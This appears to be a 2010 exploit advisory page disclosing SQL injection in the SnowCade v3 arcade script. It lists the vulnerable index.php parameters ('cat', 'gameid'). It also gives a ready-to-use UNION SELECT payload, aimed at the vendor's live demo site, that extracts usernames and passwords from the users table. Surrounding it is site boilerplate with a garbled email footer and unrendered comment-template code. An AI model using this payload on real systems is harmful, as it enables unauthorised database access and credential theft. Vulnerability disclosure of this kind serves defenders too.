SnowCade v3 SQL Injection Vulnerability

2010-06-20 / 2010-06-21

Credit: ahwak2000

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

/*
[-] SnowCade v3 SQL Injection Vulnerability [-]

---Date     : 2010-06-19
---Author : ahwak2000
---Email   :  z.u5[at]hotmail.com
[-] Script Info [-]
---Home   : http://www.arcadecreate.com/

---Demo   : http://www.arcadecreate.com/demo/v3/snowcade/index.php

[-] Vulnerability [-]

http://site.com/[path]/index.php?action=browse&cat=[SQL INj]

http://site.com/[path]/index.php?action=playgame&gameid=[SQL INj]

http://site.com/[path]/index.php?action=browse&cat=[SQL INj]

[-] DEM0[-]
http://www.arcadecreate.com/demo/v3/snowcade/index.php?action=browse&cat=31%20UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,username,password%29,3,4,5,6+from+users%20limit%201,1--

[-] Greetz to [-]
 
To All Friends in V4-team Forums And pc.pirate
*/

_________________________________________________________________
????? ?????????? ??????? ????? ?????. ???? ??? Windows Live Hotmail ??????.
https://signup.live.com/signup.aspx?id=60969

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SnowCade v3 SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.